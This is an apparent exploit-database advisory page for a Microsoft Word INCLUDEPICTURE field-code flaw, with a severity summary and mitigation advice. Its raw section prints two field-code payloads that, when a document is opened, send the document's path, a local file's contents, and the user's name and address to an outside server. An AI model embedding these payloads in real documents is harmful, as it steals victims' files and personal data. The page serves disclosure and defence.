header-logo
Suggest Exploit
vendor:
Microsoft Word
by:
Unknown
7.5
CVSS
HIGH
Arbitrary URL Insertion
601
CWE
Product Name: Microsoft Word
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:microsoft:word
Metasploit:
Other Scripts:
Platforms Tested: Windows
Unknown

Arbitrary URL Insertion in Microsoft Word INCLUDEPICTURE Field Code

The INCLUDEPICTURE Field Code in Microsoft Word allows for the insertion of arbitrary URLs into a document. This functionality can be abused by an attacker to obtain the contents of files on the victim user's system. By including the URL in the field code and referencing files on the victim's system, the attacker can potentially access sensitive information. This vulnerability can be particularly dangerous in situations where documents are constantly being shared and updated.

Mitigation:

To mitigate this vulnerability, it is recommended to disable the execution of field codes in Microsoft Word or restrict the use of the INCLUDEPICTURE Field Code. Additionally, users should exercise caution when opening documents from untrusted sources.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5764/info

The INCLUDEPICTURE Field Code may be used to insert arbitrary URLs into a document. The INCLUDEPICTURE Field Code is reported to, under some circumstances, present a security threat.

If the INCLUDEPICTURE Field Code is included in a document and references a URL, it may be possible for the attacker to obtain contents of files on the victim user's system. It is possible for an attacker to abuse this functionality in a situation where documents are constantly being shared and updated.

An attacker can potentially exploit this vulnerability to obtain the contents of files residing on a victim user's system. 

{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { FILENAME \p } & { INCLUDETEXT "c:\\a.txt" } } \d }

{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { USERNAME } & { USERADDRESS } } \d }

(The curly braces above represent Microsoft Word field braces.)

Navigation

Suggest Exploit

Services By CQR